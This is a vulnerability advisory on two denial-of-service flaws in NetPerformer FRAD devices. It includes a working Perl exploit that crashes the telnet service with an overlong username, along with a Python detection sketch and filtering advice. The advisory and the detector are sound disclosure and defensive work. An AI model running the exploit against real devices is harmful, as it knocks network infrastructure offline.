NetPerformer Frame Relay Access Device (FRAD) is a "switching & routing device that supports Ethernet and SNA protocols, Voice, etc. This device is mainly used for connecting distributed WAN networks through frame relay or ATM networks". Two security vulnerabilities discovered in NetPerformer allow remote attackers to cause the server to crash.

Credit:
The information has been provided by Arif Jatmoko.

Vulnerable Systems:
* NetPerformer FRAD ACT SDM-95xx version 7.xx (R1)
* NetPerformer FRAD ACT SDM-93xx version 10.x.x (R2)
* NetPerformer FRAD ACT SDM-92xx version 9.x.x (R1)

1. Telnet long username Buffer Overflow
Passing an overly long username (>4550 characters) to the telnet service causes the device to reboot. Successful remote exploitation could possibly allow an attacker to gain access to the device.

Exploit:
#!/usr/bin/perl
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "23",
                                    Proto    => "TCP"))
{
    print "Modhiar'000 ..... killing netperformer ... $ARGV[0] port 23...";
    sleep(1);
    print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
    sleep(1);
    print $socket "PASS " . "\r\n";
    close($socket);
}
else
{
    print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE

2. ICMP Land Attack
Sending specially crafted ICMP packets causes the device to hang and to reset the current TCP handshake connection. In earlier versions this will possibly make the device reboot.
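
Detection sketch for both issues above, as an added example that is not part of the original advisory or the vendor's code: it classifies raw IPv4 packets, flagging ICMP whose source equals its destination and telnet segments carrying an oversized line. It assumes "Land" has its usual meaning (source address equal to destination address); the 256-byte limit, the function names and the sample packets are constructed for illustration.

```python
import socket
import struct

MAX_LINE = 256  # assumed policy limit, far below the >4550 characters in the advisory

def classify(packet: bytes) -> str:
    """Classify one raw IPv4 packet: land-icmp, telnet-long-line, malformed or ok."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return "malformed"
    ihl = (packet[0] & 0x0F) * 4              # IPv4 header length in bytes
    if ihl < 20 or len(packet) < ihl:
        return "malformed"
    proto, src, dst = packet[9], packet[12:16], packet[16:20]
    if proto == 1 and src == dst:             # ICMP with source == destination
        return "land-icmp"
    if proto == 6:                            # TCP: inspect telnet payload
        seg = packet[ihl:]
        if len(seg) < 20:
            return "malformed"
        dport = struct.unpack("!H", seg[2:4])[0]
        doff = (seg[12] >> 4) * 4             # TCP header length in bytes
        if doff < 20 or len(seg) < doff:
            return "malformed"
        # Per-segment check only; a real sensor would reassemble the stream.
        lines = seg[doff:].split(b"\r\n")
        if dport == 23 and any(len(l) > MAX_LINE for l in lines):
            return "telnet-long-line"
    return "ok"

# --- constructed sample packets (checksums left at 0, documentation addresses) ---
def ipv4(proto: int, src: str, dst: str, body: bytes) -> bytes:
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(body), 0, 0, 64, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst)) + body

def tcp(dport: int, payload: bytes) -> bytes:
    return struct.pack("!HHIIBBHHH", 40000, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + payload

ECHO = struct.pack("!BBHHH", 8, 0, 0, 1, 1)   # ICMP echo request header
SAMPLES = {
    "land": ipv4(1, "192.0.2.10", "192.0.2.10", ECHO),
    "ping": ipv4(1, "192.0.2.20", "192.0.2.10", ECHO),
    "long_login": ipv4(6, "192.0.2.20", "192.0.2.10", tcp(23, b"LOGIN " + b"A" * 1000 + b"\r\n")),
    "login": ipv4(6, "192.0.2.20", "192.0.2.10", tcp(23, b"LOGIN admin\r\n")),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(f"{name:11s} {classify(pkt)}")
```

The same two conditions translate directly into edge filtering: drop inbound packets whose source address is the device's own address, and restrict or rate-limit telnet to management hosts.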